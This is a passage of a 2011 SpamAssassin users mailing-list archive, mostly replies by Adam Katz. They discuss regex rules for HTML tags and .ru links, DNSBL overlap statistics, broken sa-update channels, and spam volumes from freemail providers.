body __HAS_O_ACUTE/[\xd3\xf3]/
body __HAS_U_ACUTE/[\xda\xfa]/
body __HAS_LOS_LAS/\bl[ao]s\b/i
body __HAS_DEL_DE_LA  /\bde(?:l|\sla)\b/i
body __HAS_ESTA_ESTE  /\best[ae]\b/i
body __HAS_PARA   /\bpara\s/i

meta MAYBE_SPANISH__HAS_N_TILDE + __HAS_A_ACUTE + __HAS_E_ACUTE +
__HAS_I_ACUTE + __HAS_O_ACUTE + __HAS_U_ACUTE + __HAS_LOS_LAS +
__HAS_DEL_DE_LA + __HAS_ESTA_ESTE + __HAS_PARA  2


or maybe combining everything together; to all of the above, add:

score MAYBE_SPANISH 0.0001

# Zero or multiple languages detected
header __LANG_UNKNOWN  X-Languages =~ /^\s*$|\w \w/

meta  MAYBE_SPANISH2  SPANISH_BODY || (__LANG_UNKNOWN  MAYBE_SPANISH)
score MAYBE_SPANISH2  1


When it comes to scoring, *always start small*.  You can turn it up
(slowly, in small increments!) once you know it's safe for you.



signature.asc
Description: OpenPGP digital signature


Re: Why does this hit __HAS_ANY_URI

2011-08-22 Thread Adam Katz
On 08/14/2011 02:17 PM, Ned Slider wrote:
 Hi all,
 
 The following email hits __HAS_ANY_URI and I'm not sure why:
 
 http://pastebin.com/jvFrFhA4
 
 When I run the message through SpamAssassin in debug mode I see:
 
 dbg: rules: __DOS_HAS_ANY_URI merged duplicates: __HAS_ANY_URI
 dbg: rules: ran uri rule __DOS_HAS_ANY_URI == got hit: r
 
 SpamAssassin version 3.3.2
 
 Any clues? I'm guessing it has something to do with the email address in
 the message body?

The letter r is the beginning of an implicit mailto: URI in the body
(ram12...@live.com).



signature.asc
Description: OpenPGP digital signature


Re: blacklist based on authoritative nameservers of sender domain

2011-08-22 Thread Adam Katz
On 08/22/2011 04:13 PM, Noah Meyerhans wrote:
 I've recently observed a fair amount of spam from domains that all
 share the same set of authoritative nameservers.  It occurred to me
 that it might be nice to be able to blacklist mail from all domains
 sharing these nameservers, or maybe to simply have that trait count
 toward the spam score.

You can't do whois en-masse (I'd love that, but ...), so this means an
NS host lookup.  To determine if they are authoritative, that's another
lookup (which I don't believe is necessary).  A blocklist would also be
another lookup (if using a BL, it could check the authoritativeness),
but I don't think that's completely necessary either.

Your plugin should create enough information for bayes and rules to
access the data, say through a pseudoheader that can be explicitly added
via template tags.

Thus, you'd be able to write a rule that checks the pseudoheader for a
problematic name server.  Here's a mockup pseudoheader and matching rule
for an email that links spamassassin.org and example.net:

X-Spam-Uri-NS: [ dom=spamassassin.org ns=c.auth-ns.sonic.net
ns=ns.hyperreal.org ns=b.auth-ns.sonic.net ns=a.auth-ns.sonic.net ] [
dom=example.net ns=b.iana-servers.net. ns=a.iana-servers.net ]

header LOCAL_USES_DNS_EXAMPLE_NET X-Spam-Uri-NS =~ /
ns=[ab].iana-servers\.net /

I left out NS server IPs because that's even more DNS lookups.  URIs are
in order of appearance.  NS order is not predictable (though I suppose
we could asciibetize).

 I don't believe there's currently a plugin to allow this sort of
 thing.  Is that correct?  If so, would anybody be interested in one
 if I was to write it?  Or am I missing something obvious that makes
 this not worth doing?  I realize that the potential for collateral
 damage is high, so I don't think it'd be wise to try and publish any
 sort of data for such a plugin, but it seems like the plugin itself
 might be occasionally useful...

It might be useful, but we'd have to test it to know.



signature.asc
Description: OpenPGP digital signature


Re: SA-update: failing for khopesh.com rules?

2011-08-08 Thread Adam Katz
On Fri, 05 Aug 2011 10:49:36 -0700, Adam Katz wrote:
 I fixed this yesterday and updates are now fully functional.

On 08/05/2011 07:36 PM, Benny Pedersen wrote:
 super, i just noticed nopublis in the above file, is this intended ?

Short answer:  Yes.  The GA is too slow to publish them itself.


Longer answer:

Until subversion repository checkins reliably get published with a
sub-24h turnaround time, the rules in khop-sc-neighbors should not be
published through that mechanism.  My sa-update channel is updated a few
times each day and can handle that.

Another issue with upstream is that we'd have to be extra-careful to
retract all of these rules once we stop updating them (i.e. when a new
release comes out and the older one's auto-updates dwindle).

Its regular checkins to the SVN trunk (which are *not* as frequent as
the channel's updates) are for ruleQA purposes only, acting as evidence
that the rules are of high quality.


One further note:  The CIDR/8 rules (and the others, to a small degree)
look *very* solid to the scoring mechanism.  This is in part due to
sampling bias; we have very little ham coming in from Latin America,
Africa (esp. Nigeria), and Asia (esp. China), which tend to amplify
rules that specifically target those regions.  It is also unfair to
penalize somebody for their provider's /8, which would be entirely out
of their control.  Both of these reasons mandate the rules stay capped
at low scores.

(I hear the publishing mechanism now allows for scores set in the
sandboxes to act as upper limits on published rules.  That would solve
this issue.)



signature.asc
Description: OpenPGP digital signature


Re: SA-update: failing for khopesh.com rules?

2011-08-05 Thread Adam Katz
On 07/23/2011 01:05 PM, Benny Pedersen wrote:
 On Sat, 23 Jul 2011 00:35:41 -0700 (PDT), Fenris wrote:
 
 http://khopesh.com/sa/khop-sc-neighbors/2011062101.tar.gz request
 failed: 404 Not Found:
 
 Sorry Adam, I'm still seeing the same problem this morning, for whatever
 reason it's still asking for
 the 21st June tar.gz that was causing the problem originally.

 My end, or your end?
 
 see same problem here, other khop channels are ok with 3.3.2

One of the DNS slaves changed its IP (and my provider didn't tell me
about it), so the zone transfer requests were getting denied.  The other
one has been fine for a while, so it's luck of the draw.

I fixed this yesterday and updates are now fully functional.



signature.asc
Description: OpenPGP digital signature


Re: ok, we all get spam.. but.. spam warning us we opted out?

2011-07-27 Thread Adam Katz
 On 7/26/11 8:41 PM, Karsten Bräckelmann wrote:
 Did the message genuinely come from Dell? The named $director
 entity? Or was it an ESP on behalf of Dell?

On 07/27/2011 07:13 AM, Michael Scheidell wrote:
 noop, dell directly, with a DNSWL_MED credit on the email with the 
 default rules SA has for DNSWL.I did reply back and tell the user
 that that email finally qualifies them to take the management
 training class at mcdonalds and that they should go back to their
 local mcd's and fill out the application again.

It's probably an honest mistake from somebody at Dell that didn't
consider all the possibilities.  Rather than trying to get that person
fired, how about explaining the issue to them?  I'm sure they'll
apologize and then make sure it won't happen again (it might even
convince them to do more business with ESPs).

Certainly good for a laugh though!



signature.asc
Description: OpenPGP digital signature


Re: Heads up: Plesk + SpamAssassin, spam attack doing the rounds

2011-07-27 Thread Adam Katz
On 07/27/2011 10:32 AM, Benny Pedersen wrote:
 On Wed, 27 Jul 2011 18:13:25 +0100, Bruno Ferreira - Digitalmente Lda.
 wrote:
 Hi, registered just to post this, in hope that it'll be of help for
 some other users. This pertains boxes with Plesk + SpamAssassin.
 
 http://old.nabble.com/postfwd-stop-equal-sender-recipient-spams-td21164908.html
 
 use strong policy to drop there pants :-)

You're going to drop a lot of pants there (where?  You meant their),
as it's common practice to send manual announcement emails with From ==
To and the real recipients in the Bcc field.

We even have this rule in SpamAssassin due to popular insistence.

It does quite poorly:

  MSECSSPAM% HAM% S/ORANK   SCORE  NAME
  0   2.0912   1.5324   0.5770.50   (n/a)  __TO_EQ_FROM

http://ruleqa.spamassassin.org/20110726-r1151020-n/__TO_EQ_FROM/detail



signature.asc
Description: OpenPGP digital signature


Re: SA-update: failing for khopesh.com rules?

2011-07-19 Thread Adam Katz
Fenris b...@fenrir.org.uk wrote
 Recently (for a few weeks I think) I've been seeing errors from my 
 sa-update script, like this:
 
 /etc/cron.daily/sa-update:
 
 http: GET
 http://khopesh.com/sa/khop-sc-neighbors/2011062101.tar.gz request 
 failed: 404 Not Found:
...
 channel: could not find working mirror, channel failed
 
 Is anyone else using Adam's rules seeing this problem? It looks 
 like either something has moved or his rules are not being updated 
 at present.

2011062101 maps to June 21, which is quite old.  Those rules should be
auto-generated every few hours, with a sufficient cache of older entries
to deal with the time required to expire old DNS records.  That one is
so old that it left the cache.

The problem was an error in one of my experimental DNSBLs, which
inexplicably decided one entry should point to 127.0.0. and leave off
the trailing digit.  My vetting script failed and I've been over a month
un-noticed in not serving DNS from my private root (khopesh.com's NS
records are slaves, they've been working fine since getting cut off).

Fixed.

Feel free to yell at me directly and earlier next time :-)
... Cc the list so others don't independently do the same.


On 07/19/2011 09:02 AM, Jezz wrote:
 I'm getting the same thing with khop-sc-neighbors, but not with the 
 other two that I use (khop-general and khop-dynamic). However I 
 haven't had any update from those latter two since 24 June, which is 
 also a little unusual.

That's because I haven't updated any of the manual channels since
February.  I'll get around to that at some point, but it won't become
high priority until 3.4.0 comes out, as the main benefit of those
channels is that they newer rules before they get published themselves
(e.g. khop-bl is good at bringing sa3.2.5 a little more up to date,
though it also adds other DNSBLs and then compensates for the extra
overlap, which is probably the only safe way to use some of them, like
SEM).  Also, I've been pushing things to the trunk more than my
channels, though khop-dynamic is pretty much read for upstream publishing.

Again, this is a limited time thing (I get burned out from all the SA
rule writing I'm doing professionally!).  Another hurdle is the
conflict-of-interest bit; I got access to some nice data streams right
before taking on my current job but need to ping those suppliers before
actually using the data due to these changes.  Otherwise, sc-neighbors
would be significantly improved...



signature.asc
Description: OpenPGP digital signature


Re: FSL_RU_URL Re: whitelist

2011-06-24 Thread Adam Katz
On 06/23/2011 05:48 PM, Noel Butler wrote:
 Hrmm sa-update reports no new updates, last touch date was march 25
 
 Jun 24 10:21:24.410 [30018] dbg: dns: 1.3.3.updates.spamassassin.org =
 1083704, parsed as 1083704
 Jun 24 10:21:24.410 [30018] dbg: channel: current version is 1083704,
 new version is 1083704, skipping channel

Whoa, not sure how I missed that;

% host -ttxt 1.3.3.updates.spamassassin.org.
1.3.3.updates.spamassassin.org descriptive text 1083704
% host -ttxt mirrors.updates.spamassassin.org.
mirrors.updates.spamassassin.org descriptive text
http://spamassassin.apache.org/updates/MIRRORED.BY;
% wget -qq -O - http://spamassassin.apache.org/updates/MIRRORED.BY
# test mirror: zone, cached via Coral
#http://buildbot.spamassassin.org.nyud.net:8090/updatestage/
http://daryl.dostech.ca/sa-update/asf/ weight=5
http://www.sa-update.pccc.com/ weight=5
% wget -qq http://daryl.dostech.ca/sa-update/asf/1083704.tar.gz
% tar -zxf 1083704.tar.gz
% grep FSL_RU_URL *cf
72_active.cf:##{ FSL_RU_URL
72_active.cf:uri  FSL_RU_URL  /[^\/]+\.ru(?:$|\/|\?)/i
72_active.cf:#scoreFSL_RU_URL  0.01
72_active.cf:##} FSL_RU_URL
72_scores.cf:score FSL_RU_URL  3.499 2.271 3.499 2.271

We'll need to fix that.


 I do have a few from years gone by, do you know off hand if these are
 no longer needed postcards.cf rateware.cf 70_tt_drugs.cf
 99_anonwhois.cf, the others I use give us hits, but its rare that
 those do.

ratware (different from rateware?) and tt_drugs should be wholly
obsoleted by existing rules.  John Hardin wrote postcards.cf (which I
had never seen before), so since he's on this list, he can comment on
that (were those ever in svn?).

I ran across the AnonWhois stuff (which is owned by Spam-Eating Monkey,
whose DNSBL has had issues in the past) a while ago and forgot about it
... looks like it's maintained (last updated 2011-01-17), but it lacks
an sa-update channel (so like Malware Patrol, you have to grab it
yourself).  Note that all the rules are scored 0.001 (as they should
be!), so unless you're building rules from these, they are useless to
you and will waste bandwidth.  By the way they implement things, a lot
of bandwidth (100 lookups per link per email; you just wasted 600
lookups on this message alone!).  Bottom line:  delete this file.

 Since FSL_RU_URL is so broad that it will match any link to any .ru
 domain, we don't really need to see an example (unless you're confident
 you have an example which lacks an actual .ru link ... this is a bug if
 that's triggering on one of the headers you're mentioning).

 That's what prompted me to ask, it is very broad.

Pastebin an example or two and link us to them.



signature.asc
Description: OpenPGP digital signature


FSL_RU_URL Re: whitelist

2011-06-23 Thread Adam Katz
On 06/22/2011 05:42 PM, Noel Butler wrote:
 Resurrecting an old thread but
 Lately I see a lot of false hits on   FSL_RU_URL
 The only place in the email where .ru is, is in envelope-from ,  from,
 and the received headers, this is supposed to be
 from   72_active.cf:uriFSL_RU_URL  /[^\/]+\.ru(?:$|\/|\?)/i
 
 (those also on the c-nsp list may also be seeing the same?)
 This only started recently.

Full rule, originating from rulesrc/sandbox/maddoc/99_fsl_testing.cf

uri  FSL_RU_URL  /[^\/]+\.ru(?:$|\/|\?)/i
tflags   FSL_RU_URL  nopublish
scoreFSL_RU_URL  0.01

I see several problems here.

Chiefly, it's marked nopublish but is in some(?) copies of
72_active.cf (not trunk, and the rule is completely absent from the
current 3.3 and 3.2 svn branches) ... is this out of sync?  IIRC, we
fixed this problem a while ago, so perhaps Noel's system isn't properly
using sa-update, it hasn't propagated yet, or he's doing something fishy.

Scoring a rule in a sandbox is good for documentation purposes
(especially if mirroring a third-party sa-update channel), but has no
bearing on the resulting score published through the GA.  Therefore,
scoring something 0.01 as a safety net does nothing.  A rule with tflags
nopublish and score 0.01 is much safer (given our current bugs) if named
with the T_ prefix.  (Other devs, please correct me if I'm wrong here;
I'm not fully sure about the un-sandboxing mechanism.)

A safer and cleaner regex for that rule would be:

uri  FSL_RU_URL  m'^http://[^/:#?]+\.ru\b(?:$|[/:#?])'i

This prevents FPs like http://ham.example.com/how.ru and FNs like
http://spam.example.ru:8080/gotcha and uses a regex character class
(square brackets) rather than branches (pipes) for efficiency and
legibility purposes.  The \b also provides a (very minor) efficiency
boost.  It also excludes https links as they're more likely to be ham.
I moved to m'' to avoid the need to escape slashes.

Even still, this is an awful rule, especially without leading
underscores (e.g. __FSL_RU_URL) to be used in a meta rule that hunts a
particular spam pattern.


As Ned answered, we need more information.  Specifically, tell us about
your setup; what version (and package) of SpamAssassin are you using,
tell us about your sa-update configuration, any hacks, etc.

Since FSL_RU_URL is so broad that it will match any link to any .ru
domain, we don't really need to see an example (unless you're confident
you have an example which lacks an actual .ru link ... this is a bug if
that's triggering on one of the headers you're mentioning).



signature.asc
Description: OpenPGP digital signature


Re: Yahoo sent 5.5x as much spam as any other legit provider in April

2011-05-11 Thread Adam Katz
On 05/11/2011 01:19 PM, dar...@chaosreigns.com wrote:
 I bet it's largely related to the fact that yahoo is apparently the
 only freemail provider that doesn't require you to have a previously
 existing email address.

I just created a test @live.com (hotmail) account without an
existing address.  Just tell it to use a security question instead.  I
am under the impression that gmail is the only one that has that sort of
protection, and even it is trivially defeated (look up mailinator for
one method).



signature.asc
Description: OpenPGP digital signature


Re: Yahoo sent 5.5x as much spam as any other legit provider in April

2011-05-11 Thread Adam Katz
On 05/11/2011 01:01 PM, dar...@chaosreigns.com wrote:
 http://www.chaosreigns.com/dnswl/dnswlabusehistory.svg

Too bad FF doesn't let me zoom on an svg; had to hit F11 to see it.

 Percentage of total spam from legitimate email providers in April as
 reported as abuse to dnswl.org:
 
 35.5% yahoo.com
  6.4% google.com
  2.9% tp.pl
  2.3% tin.it
  1.8% messagelabs.com
  1.4% hotmail.com
  1.1% postini.com
  1.0% orange.fr
  1.0% aol.com
...

Long tail there; the sum of all of your items was 56.5%.  Even if you
truncated those numbers, it doesn't add up (56.5 + 19 * 0.1%  = 58.4%).

I'm not sure how much of my company's data I can disperse, but here's a
peek.  We break things down a little differently, but here is what
overlaps (as isolated by From header in trap + report data, classified
spam only):

100.0%  (sum of all items below)
 32.6%  yahoo
 29.4%  hotmail + live
 17.3%  gmail
 10.8%  aol
  9.8%  facebook
  0.1%  orange.fr

So with this data, yahoo sent 1.1x as much as hotmail.



signature.asc
Description: OpenPGP digital signature


Re: Amazon S3 triggering FPs with SPOOF_COM* rules

2011-04-26 Thread Adam Katz
On 03/24/2011 05:44 PM, Jason Haar wrote:
 Apparently when you use sharethis.com (who use S3 for hosting services)
 to send out links, the links look like
 
 hXXp://img.sharethis.com *DOT* s3.amazonaws.com
 
 I imagine from this that ANY .com domain using Amazon S3 services would
 create similar URLs?
 
 This causes SPOOF_COM* rules to trigger
 
 *  3.0 SPOOF_COM2OTH URI: URI contains .com in middle
 *  1.6 SPOOF_COM2COM URI: URI contains .com in middle and end
 
 Owch. So there's a big class of FPs happening there, and I'd say there's
 redundancy in those rules? i.e. is 4.6 really an appropriate score for
 *one* img link?

Not necessarily a perfect fix, but I've checked in r1096851 which
specifically excludes S3 from these rules.  Note that most CDNs are .net
(like Coral CDN, e.g. www.spamassassin.org.nyud.net) and therefore won't
hit _COM2COM.  Coral doesn't tack on enough subdomain levels to trigger
COM2OTH.

There's still the issue of perhaps wanting these rules to be mutually
exclusive.  Maybe SPOOF_COM2OTH, which is currently (with my edit):

m{^https?://(?:\w+\.)+?com\.(?!s3\.amazonaws\.com)(?:\w+\.){2}}i

Should become this:

m{^https?://(?:\w+\.)+?com\.(?:\w+\.){2,}?(?!com\b)}i

(oops, the other rules should be com\b too.  checked in as r1096857.)



signature.asc
Description: OpenPGP digital signature


Re: Regex help

2011-04-22 Thread Adam Katz
On 04/21/2011 05:22 PM, John Hardin wrote:
 On Thu, 21 Apr 2011, Adam Katz wrote:
 
 rawbody LOCAL_5X_BR_TAGS   /(?:br\/?[\s\r\n]{0,4}){5}/mi
 
 ...when does \s{0,4} not match the same text as [\s\r\n]{0,4} ?
 
 (i.e. \r and \n are whitespace, no?)

I believe they are identical assuming /msi flags.  I seem to recall a
particular problem with the engine having trouble here, though that was
probably related to rendered bodies on systems that determine line
breaks differently.  It may instead be related to something specific
with my company's implementation, which is rather nonstandard.

Finally, [\s\r\n] is more legible for troubleshooting as it acts as a
reminder of what is going on.  In the event that there is an efficiency
issue, \s is first.



signature.asc
Description: OpenPGP digital signature


Re: Regex help

2011-04-22 Thread Adam Katz
On 04/22/2011 07:02 AM, Joseph Brennan wrote:
 I'd be cautious with this.
 
 I have tried scoring for multiple br and also for more than ten 
 closing /div in a row, but unless you score very low, you'll get 
 false positives. Unfortunately some legitimate software products 
 translate their native format into HTML with ugly code like that.
 
 It could be that a meta of multiple br plus something else gets a
 more accurate spam diagnosis, so I'm not saying it's useless, but it
 is not as straightforward as it seems.

+1

My mention of this may have been lost in the noise, especially given how
I've continued along this path intellectually.



signature.asc
Description: OpenPGP digital signature


Re: Regex help

2011-04-22 Thread Adam Katz
Getting back to a viable solution to your actual spam problem...

 Adam Katz wrote:
 How about this rule instead:
 
 blacklist_from  *@regionstargpsupdates.com

On 04/21/2011 04:37 PM, Kevin Miller wrote:
 Yes, but then I'm playing whack-a-mole.  Looking at the spam in html
 format (i.e., in the original email) one can see a similarities in
 style - probably produced from a template.  But the domain varies
 widely.  I may get anywhere from a half dozen to several dozen from
 any one domain, then never see that domain again.  Classic botnet
 behaviour.  These guys cycle through domains and from addresses
 regularly.

Okay, I couldn't tell that from your single sample.  Perhaps you can
post a few more?

If it's easier to post in one pass, you can use the following shell code
(as adjusted to include the proper files rather than my guesses) to
generate a fake mbox file (/tmp/dump) and then paste that into a pastebin:

for msg in p3LJZSnX024470 p3LJZSnX024471 p3LJZSnX024472 p3LJZSnX024473;
do echo From $msg@KM /tmp/dump; cat $msg /tmp/dump; done

Fun note:  pastebin.com now supports email syntax highlighting!



signature.asc
Description: OpenPGP digital signature


Re: Regex help

2011-04-21 Thread Adam Katz
Before I help you with your shell and regex issues, I should point out
that this is not a very strong rule.  It will hit ham.

On 04/21/2011 02:54 PM, Kevin Miller wrote:
 I'm trying to write a local rule that will scan for 5 or more 
 instances of br but not having much luck.  I'm testing first on 
 the CLI, just trying to get the syntax down.

 What works:
 I have a file called DomainLiterals.txt with repeating characters
 and it returns expected results:
 mkm@mis-mkm-lnx:~$ egrep \[10.]{3} DomainLiterals.txt 
 you can add a line containing only [10.10.10.10] to
 /etc/mail/local-host-names where 10.10.10.10 is the IP address you

The regex '\10.]{3}' is invalid.  It un-escapes from the command line as
'[10.]{3}' but will match any of these:

111
...
000
10.
.01

since it is asking for three of any character matching one, zero, or
dot.  The grouping symbol you are looking for is a curly-bracket, and
the dot (when outside a square bracket) must be escaped as it otherwise
means any single character.

 However, doing this fails:
 mxg:/var/spool/MailScanner/quarantine/20110421/nonspam # egrep \[br]{5,} 
 p3LJZSnX024470
 -bash: br: No such file or directory
 
 The file p3LJZSnX024470 is just a plain text file in a quarantine directory.

Again, you have a CLI escaping issue AND a regex issue.  If you are not
quoting that query, you need to escape almost every single punctuation
character listed there.  Alternatively, you could put that query in quotes.

egrep \[br]{5,} p3L... tells the shell that you are looking for the
query [ from input file br and you want to output your results to
(invalid) file ] and then run the command 5, in a subshell, followed
by a third command (your email file).

egrep '[br]{5,}' p3L... prevents the shell from trying to interpret
your query but still has a bad query, as it looks for five or more
consecutive occurrences of any character listed between the angle
brackets, so bbrr/b will match up to the slash.

 What am I missing? I'll turn this into a body rule once I get the
 syntax right then test it for a day or so w/a score of .01. If I'm not
 hitting legitimate mail I'll bump it up.

On top of all of this, egrep does not use Perl-compatible regular
expressions (PCRE) (though the regexps I've used so far are compatible
with Posix regexps as well as PCRE).  See 'man perlre' (or your favorite
website) for help on PCREs.  Try using either grep -P (requires
libpcre3) or pcregrep (which you may have to install) or else perl
itself, like:

  perl -ne 'print if /whatever/'   DomainLiterals.txt

As to what that should be searching for, I suspect you want a multi-line
expression (which none of the above shell commands will help you with
since they parse one line at a time).  Try this:

header  LOCAL_10_10_10_10  X-Spam-Relays-Untrusted
   =~ /^[^\[]+ ip=(?:10\.){3}/

rawbody LOCAL_5X_BR_TAGS   /(?:br\/?[\s\r\n]{0,4}){5}/mi

That second one will also match br/ and allows for a few spaces, tabs,
or linebreaks in between the br tags.  For a more strict version of
what you're looking for, try this:

rawbody LOCAL_5X_BR_TAGS   /(?:br){5}/i

Note that you need rawbody since body rules will strip HTML.


Again, this rule will hit some hams.  It is also not terribly CPU-efficient.

Better solution:  put some examples up on a pastebin and link them to us
so we can help you find more diagnostic (and simpler) patterns to nail
them with.



signature.asc
Description: OpenPGP digital signature


Re: Regex help

2011-04-21 Thread Adam Katz
 egrep '[br]{5,}' p3L... prevents the shell from trying to interpret
 your query but still has a bad query, as it looks for five or more
 consecutive occurrences of any character listed between the angle
 brackets, so bbrr/b will match up to the slash.

Between the square brackets ([ and ]), sorry.
Angle brackets ([ and ) have no special meaning in PCRE (though
they're word boundaries in vim's very-magic regexps) while square
brackets note character classes as noted in man perlre

(I always chuckle when I see them called that; makes me want to do
something like '[[:paladin:]]*?' ... or in vim, '\v[[:paladin:]]{-}'
which looks for a very magical member of the paladin class in a group
that is not greedy.  Too bad I can't also specify race.  Maybe I can
create a race condition?)



signature.asc
Description: OpenPGP digital signature


Re: Regex help

2011-04-21 Thread Adam Katz
On 04/21/2011 03:55 PM, Kevin Miller wrote:
 Thanks (also to Martin who replied).  I posted one of the spams here:
 http://pastebin.com/9aBAxR7m
 
 You can see the long series of break codes in it.

Yes I can.  I can also see several other diagnostic bits in it, such as
the domain:  http://www.siteadvisor.com/sites/regionstargpsupdates.com

How about this rule instead:

blacklist_from  *@regionstargpsupdates.com

It's much faster and, given the report of the domain being that of a
spammer, much much safer.

 Sorry for the confusion on the 10.10.10.10 - that isn't part of the
 spam, it was just a handy file for testing since it had a repeating
 string in it.

It was a faulty test since '[10.]{3}' will match '10.10.10.10' but not
in the way that you think; it matches the first three characters and
will therefore also match the string '110.64.323.6'

 I did get it to work from the CLI, and wrote the following rule:
 
 body  CBJ_GiveMeABreak  /\[br]{5,}/
 describe  CBJ_GiveMeABreak  Messages with multiple consecutave break 
 characters
 score CBJ_GiveMeABreak  0.01

That will not match your sample.  Please re-read my message.  The regex
is wrong and the rule type (body) is wrong.

 I know it may trigger on some ham which is why I set the initial
 score to 0.01.  Better ideas are most welcome though!




signature.asc
Description: OpenPGP digital signature


Darxus's LOCAL_8X_TAGS

2011-04-21 Thread Adam Katz
Broken apart from previous thread to prevent confusion.

On 04/21/2011 04:18 PM, dar...@chaosreigns.com wrote:
 On 04/21, Adam Katz wrote:
 rawbody LOCAL_5X_BR_TAGS   /(?:br\/?[\s\r\n]{0,4}){5}/mi

 I wonder if it would be useful to generalize this as:

 rawbody LOCAL_8X_TAGS   /(?:[^]*[\s\r\n]{0,4}){8}/mi

 Just a mess of tags in a row without any content.

I'm not sure about email clients specifically, but it is (or rather,
used to be -- I'm way out of date here) a common WYSIWYG foible to
create empty tags when the user plays with various formatting buttons
(like bold and italics) as they decide how something is presented.
Therefore, it is not uncommon to have strings like this:

b/bb1./b biExample bullet/i/bb
/b

I kept thinking that there was a good psychology study in there
somewhere since good knowledge with the inner workings of a specific
WYSIWYG editor would reveal lots of information about how the document
was composed (order, revisions, etc).

HTML generators' sloppiness is so abundant that many of them actually
run their final code through a cleanser application (e.g. Wikipedia uses
HTML Tidy).



signature.asc
Description: OpenPGP digital signature


Re: Mailspike Performance

2011-04-14 Thread Adam Katz
On 04/12/2011 01:39 AM, Warren Togami Jr. wrote:
 We haven't had working statistics viewing for a few weeks, but now it
 is fixed and I'm amazed by the performance of RCVD_IN_MSPIKE_BL.
 
 http://ruleqa.spamassassin.org/20110409-r1090548-n/T_RCVD_IN_MSPIKE_BL/detail
 
 
 RCVD_IN_MSPIKE_BL has nearly the highest spam detection ratio of all
 the DNSBL's, second only to RCVD_IN_XBL. But our measurements also
 indicate it is detecting this huge amount of spam with a very good
 ham safety rating.
 
 * 84% overlap with RCVD_IN_XBL - redundancy isn't a huge problem
 here because XBL is a tiny score.  But 84% is surprisingly low
 overlap ratio for such high spam detecting rule.  This confirms that
 Mailspike is doing an excellent job of building their IP reputation
 database in a truly independent fashion.
 * 67% overlap with RCVD_IN_PBL - overlap with PBL is concerning
 because PBL is a high score.  But 67% isn't too bad compared to other
 production DNSBL's.
 * 58% overlap with RCVD_IN_PSBL - pretty good

I created a meta for testing new DNSBLs a short while ago and didn't say
anything about it:

meta PUBLISHED_DNSBLS   RCVD_IN_XBL || RCVD_IN_PBL || RCVD_IN_PSBL ||
RCVD_IN_SORBS_DUL || RCVD_IN_SORBS_WEB || RCVD_IN_BL_SPAMCOP_NET ||
RCVD_IN_RP_RNBL
tflags   PUBLISHED_DNSBLS   net nopublish   # 20110127

meta PUBLISHED_DNSBLS_BRBL  PUBLISHED_DNSBLS || RCVD_IN_BRBL_LASTEXT
tflags   PUBLISHED_DNSBLS_BRBL  net nopublish   # 20110127

RCVD_IN_MSPIKE_BL has 99% overlap with the SA3.3 set and 98% with the
SA3.2 set.  That leaves 0.6758% of spam uniquely hitting this DNSBL (1%
of its 67.5822%).  RCVD_IN_SEMBLACK has the same story, resulting in
0.5138% unique spam from its 1% non-overlap (though note its lower s/o).

I'm guessing we have enough lists that they're all around this ballpark,
though we can't prove that without adding seven more meta rules (or
merely grepping the spam.log files).



signature.asc
Description: OpenPGP digital signature


Re: SpamCop and false positives from Yahoo

2011-04-08 Thread Adam Katz
 I'm seeing a lot of false positives from SpamCop blacklisting Yahoo
 mail IP's.

 For example:
 http://www.senderbase.org/senderbase_queries/detailip?search_string=98.138.82.0%2F24
 http://www.senderbase.org/senderbase_queries/detailip?search_string=115.178.12.0%2F24

 Anyone tried or anyone have a contact at SpamCop who can get Yahoo
 mail blocks whitelisted?

On 04/07/2011 11:33 PM, Mark Chaney wrote:
 White listing yahoo is a horrible idea. As usual, you should just
 use spamcop for scoring, not outright blocking email. Spamcop has had
 a poor reputation for false positives for a quite awhile now.

Yahoo sometimes selects specific IP ranges for sending mail with
spammy-looking qualities so as to keep their less spammy users on
cleaner relays.  This is mostly damage control and is by no means
reliable.  It certainly can't have trust extended to third-party indices
like CBL, SpamCop, or DNSWL, though (as you can see) it does leave a mark.

Note, I am not speaking for my employer, etc etc.  (Please assume this
unless I say otherwise.)



signature.asc
Description: OpenPGP digital signature


Re: Create a rule to block MAX recipients

2011-04-06 Thread Adam Katz
On 04/06/2011 01:00 PM, John Hardin wrote:
 Dang, I thought these were already in my sandbox:
 
 describe TO_TOO_MANY To: too many recipients
 header   TO_TOO_MANY To =~ /(?:,[^,]{1,80}){30}/
 
 describe TO_WAY_TOO_MANY To: too many recipients
 header   TO_WAY_TOO_MANY ToCc =~ /(?:,[^,]{1,80}){50}/
 
 describe CC_TOO_MANY Cc: too many recipients
 header   CC_TOO_MANY Cc =~ /(?:,[^,]{1,80}){30}/

It's been in mine for ages:

header   KHOP_BIG_TO_CC  ToCc =~ /(?:[^,\@]{1,60}\@[^,]{4,25},){10}/
describe KHOP_BIG_TO_CC  Sent to 10+ recipients instaed of Bcc or a list

I'm pretty sure I've had several other iterations of it as well, but
they've all been wiped because they perform miserably.  This is a good
mark of a nontechnical user rather than spam.  Most of its hits are ham.

http://ruleqa.spamassassin.org/20110319/%2FKHOP_BIG_TO_CC

  MSECSSPAM% HAM% S/ORANK   SCORE  NAME
  0   0.5786   0.6643   0.4660.420.01  T_KHOP_BIG_TO_CC

Looking at the score map, most spam this hit is already easily marked as
such.

My recollection of earlier incarnations of these rules is that they were
reliably under the 0.400 S/O mark.

This is best implemented at the MTA.  Reject too many recipients and
make sure that the sender knows what was wrong.



signature.asc
Description: OpenPGP digital signature


Re: ups.com virus has now switched to dhl.com

2011-03-31 Thread Adam Katz
On 03/31/2011 08:59 AM, Michael Scheidell wrote:
 all those nice ups.com rules, tests and signatures?
 
 the EXACT same file that was in a ups.com virus? is now being sent 
 'from' dhl.com (come on ups/dhl.. I know SPF is broken, but in this
 case it would sure help is decide if the sending ip is authorized to
 send on your behalf)

What rules?  Running `grep -Pri '\b\w?ups' rules*` ('\w?' allows for
matching '\bups') hits only one related rule, DOS_FAKE_UPS_TRACK_NUM,
which is still in testing (and keys on the word 'UPS' in the subject,
not the domain).

I'm recalling DHL scams being more prevalent than UPS for a long long
time, but ymmv.

 with some pretty weird received lines:  is this 'ipv8'? 
 
 received:from smtp1.txfxczpw.net ([11169.98.12888.1258]) by
 relay.cxjrc.com with SMTP; Thu, 31 Mar 2011 09:09:04 -0600
 message-id:2e9701cbef83$48a30ab0$6500a8c0@MERIDA

Hah, somebody forgot an upper bound on their random number generator!
I've never seen a fake IP octet greater than the three hundreds (TV
shows sometimes use those like 555- phone numbers).



signature.asc
Description: OpenPGP digital signature


Re: Spam

2011-03-30 Thread Adam Katz
On 03/29/2011 04:57 PM, Martin Gregorie wrote:
 On Wed, 2011-03-30 at 00:58 +0200, mar...@swetech.se wrote:
